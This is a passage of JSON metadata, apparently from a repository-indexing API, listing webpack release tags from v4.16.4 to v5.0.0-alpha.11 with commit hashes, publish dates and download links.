_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.11/manifests"},{"name":"v4.29.5","sha":"073813f1913e000302be557272b2d11195f9c2e6","kind":"tag","published_at":"2019-02-18T10:05:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.5","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.5/manifests"},{"name":"v4.29.4","sha":"7ecf992bd97204fbfaeed18e3e21fb9fcd46352f","kind":"tag","published_at":"2019-02-15T15:10:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.4","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.4/manifests"},{"name":"v5.0.0-alpha.10","sha":"2d7338d2b5cc70c6bd250a878d8a9717cc02cb95","kind":"tag","published_at":"2019-02-07T08:49:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.10","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.10/manifests"},{"name":"v4.29.3","sha":"b934e26da8b65bdf36b3c71141d0c2d8397d9f44","kind":"tag","published_at":"2019-02-07T08:22:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.3/manifests"},{"name":"v4.29.2","sha":"74b8aac0adfb0c79d70a99fa86635930db8944fd","kind":"tag","published_at":"2019-02-06T14:05:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.2/manifests"},{"name":"v4.29.1","sha":"6934b9814492b049e67efb3ccf7254d8917e01f9","kind":"tag","published_at":"2019-02-04T17:01:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.1/manifests"},{"name":"v5.0.0-alpha.9","sha":"92a36b1a9c0ed554c0f7e74bf1bc98c77a768fcc","kind":"tag","published_at":"2019-01-27T12:18:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.9","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.9/manifests"},{"name":"v4.29.0","sha":"25bccd4c487a5bf743efc62947d81a8eaa81a90f","kind":"tag","published_at":"2019-01-20T17:38:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.0/manifests"},{"name":"v5.0.0-alpha.8","sha":"adff7f61a2595ea9a04c0f3070add21be01607fb","kind":"tag","published_at":"2019-01-19T19:24:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.8","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.8/manifests"},{"name":"v5.0.0-alpha.7","sha":"18aca2fcb148d04ba3d0b37742f50534d42a7ec3","kind":"tag","published_at":"2019-01-19T12:11:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.7","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.7/manifests"},{"name":"v5.0.0-alpha.6","sha":"4be6797700753a54b223600f01e941580b6a6ba3","kind":"tag","published_at":"2019-01-15T16:39:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.6","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.6/manifests"},{"name":"v4.28.4","sha":"fdb6b139b94273e5b18870262c193a93f65132e8","kind":"tag","published_at":"2019-01-10T15:48:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.28.4","html_url":"https://github.com/webpack/webpack/releases/tag/v4.28.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.28.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.4/manifests"},{"name":"v5.0.0-alpha.5","sha":"0d9ed482bc39fb23040ffd26823e0b7ed73320cb","kind":"tag","published_at":"2019-01-09T14:20:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.5","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.5/manifests"},{"name":"v5.0.0-alpha.4","sha":"b97bc4bc062cd5395de8b00115519472645d57d0","kind":"tag","published_at":"2019-01-08T14:09:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.4/manifests"},{"name":"v5.0.0-alpha.3","sha":"762155dc2da6795dfe72a5cbeb632fc42c9c49e0","kind":"tag","published_at":"2018-12-29T17:13:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.3/manifests"},{"name":"v4.28.3","sha":"983c2616ec1b869bfb659b6331bd2fe2abc66e23","kind":"tag","published_at":"2018-12-29T11:55:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.28.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.28.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.28.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.3/manifests"},{"name":"v5.0.0-alpha.2","sha":"88f0e18e64c7935723348de3b7dd1aa92050999c","kind":"tag","published_at":"2018-12-26T10:33:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.2/manifests"},{"name":"v5.0.0-alpha.1","sha":"90a0866efcd35401353c9e8d5c904fe2cd407f7e","kind":"tag","published_at":"2018-12-23T20:24:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.1/manifests"},{"name":"v4.28.2","sha":"fe514dd975f1d2dd1546906a6f4c0a6b2a0e3761","kind":"tag","published_at":"2018-12-22T12:53:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.28.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.28.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.28.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.2/manifests"},{"name":"v5.0.0-alpha.0","sha":"3f068c38610a1edfd6be2adf53a2dea44525cfde","kind":"tag","published_at":"2018-12-21T14:17:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.0/manifests"},{"name":"v4.28.1","sha":"7a6a71f1e9349f86833de12a673805621f0fc6f6","kind":"tag","published_at":"2018-12-20T17:10:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.28.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.28.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.28.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.1/manifests"},{"name":"v4.28.0","sha":"e871eeb121a69efd6cbfa56f977d5843bf030202","kind":"tag","published_at":"2018-12-19T10:37:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.28.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.0/manifests"},{"name":"v4.27.1","sha":"4056506488c1e071dfc9a0127daa61bf531170bf","kind":"tag","published_at":"2018-12-05T19:13:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.27.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.27.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.27.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.27.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.27.1/manifests"},{"name":"v4.27.0","sha":"f47bf8b64f9698cb05eff62832a04267823039cf","kind":"tag","published_at":"2018-12-04T09:31:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.27.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.27.0/manifests"},{"name":"v4.26.1","sha":"8e841feda3ef32c64df1a175d0d9f71e47cfbe8e","kind":"tag","published_at":"2018-11-25T20:25:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.26.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.26.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.26.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.26.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.26.1/manifests"},{"name":"v4.26.0","sha":"04f90c53eeae4817a9c515a0daca119d0decfa45","kind":"tag","published_at":"2018-11-19T08:39:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.26.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.26.0/manifests"},{"name":"v4.25.1","sha":"2361995a429794d372d61e3fb628dea3929e0ca4","kind":"tag","published_at":"2018-11-05T18:12:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.25.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.25.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.25.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.25.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.25.1/manifests"},{"name":"v4.25.0","sha":"290094e10a990aa3fd8073b02b4dc57781f924d7","kind":"tag","published_at":"2018-11-05T08:37:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.25.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.25.0/manifests"},{"name":"v4.24.0","sha":"9e397b5664dab3af0ceb2fa93cb5c539f02c023c","kind":"tag","published_at":"2018-11-02T12:11:01.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.24.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.24.0/manifests"},{"name":"v4.23.1","sha":"607cf70eddd213a690585276f7124963536781e7","kind":"tag","published_at":"2018-10-25T08:26:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.23.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.23.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.23.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.23.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.23.1/manifests"},{"name":"v4.23.0","sha":"a4feb6e15ff7ac19bab1a458de369a887dde44fe","kind":"tag","published_at":"2018-10-24T15:45:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.23.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.23.0/manifests"},{"name":"v4.22.0","sha":"894eca20bd678ca5473cfca28f332a7322c64b8e","kind":"tag","published_at":"2018-10-21T09:34:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.22.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.22.0/manifests"},{"name":"v4.21.0","sha":"432d2a3f174b08d5f4f7de018799c97a18efa1fd","kind":"tag","published_at":"2018-10-17T17:47:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.21.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.21.0/manifests"},{"name":"v4.20.2","sha":"5c5e902c8e89afeb51ad130f12a908b89d627fc5","kind":"tag","published_at":"2018-09-25T20:31:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.20.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.20.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.20.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.20.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.20.2/manifests"},{"name":"v4.20.1","sha":"91e9dd77062797e3e716485f295d32a5cab57042","kind":"tag","published_at":"2018-09-25T13:25:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.20.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.20.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.20.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.20.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.20.1/manifests"},{"name":"v4.20.0","sha":"c4d8a3c8d67239f6457fd7560d9bea14524ff4f0","kind":"tag","published_at":"2018-09-25T07:15:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.20.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.20.0/manifests"},{"name":"v4.19.1","sha":"b7121c15e1cc810ead6aa0f4b2aad4666c072257","kind":"tag","published_at":"2018-09-18T07:56:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.19.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.19.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.19.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.19.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.19.1/manifests"},{"name":"v4.19.0","sha":"6bf832398c3905e06300596caddb073c583d94c4","kind":"tag","published_at":"2018-09-13T22:04:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.19.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.19.0/manifests"},{"name":"v4.18.1","sha":"c51a1bab94e4ff8ffca443e4fcb038bc4911e65e","kind":"tag","published_at":"2018-09-13T10:22:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.18.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.18.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.18.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.18.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.18.1/manifests"},{"name":"v4.18.0","sha":"ee7d9485fa30d1d3d5adbfdfb52c8f57ae8b439e","kind":"tag","published_at":"2018-09-10T15:34:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.18.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.18.0/manifests"},{"name":"v4.17.3","sha":"ee27d36e7cb0bed3ca32911165bbf01fef993e48","kind":"tag","published_at":"2018-09-10T14:25:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.17.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.17.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.17.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.3/manifests"},{"name":"v4.17.2","sha":"dfe6379052598a00f13bfa4f34ac73856ddf3dd0","kind":"tag","published_at":"2018-09-03T17:25:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.17.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.17.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.17.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.2/manifests"},{"name":"v4.17.1","sha":"ff3ef5eb284ddcd3da8c3f5bef6318e873779ffe","kind":"tag","published_at":"2018-08-22T09:50:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.17.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.17.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.17.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.1/manifests"},{"name":"v4.17.0","sha":"6f1f18f84dee330ec582d4e9c075c47c9a732102","kind":"tag","published_at":"2018-08-21T08:42:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.17.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.0/manifests"},{"name":"v4.16.5","sha":"025338cc91a867768325120d325b341bdcdc4321","kind":"tag","published_at":"2018-08-06T07:13:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.16.5","html_url":"https://github.com/webpack/webpack/releases/tag/v4.16.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.16.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.5/manifests"},{"name":"v4.16.4","sha":"1e9d98cb4e52a6efc58f516aa7451d1faa6347ba","kind":"tag","published_at":"2018-08-02T13:46:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.16.4","html_url":"https://github.com/webpack/webpack/releases/tag/v4.16.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@